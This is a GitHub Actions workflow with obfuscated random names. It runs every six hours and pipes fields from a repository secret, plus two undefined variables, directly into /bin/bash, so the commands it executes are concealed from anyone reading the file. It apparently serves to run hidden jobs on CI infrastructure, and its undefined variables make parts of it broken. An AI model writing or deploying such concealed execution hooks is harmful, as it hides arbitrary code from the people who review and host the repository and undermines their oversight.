name: mufuya3456
on:
  workflow_dispatch:
  schedule:
    - cron: '21 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mufuya3456
        env:
          n63123: ${{ secrets.n63123 }}
        run: |
          echo $n63123 | jq -r .yyyhy01 | /bin/bash
          echo $u569 | jq -r .vjb9 | /bin/bash
          echo $afj63835 | jq -r .psg84889 | /bin/bash

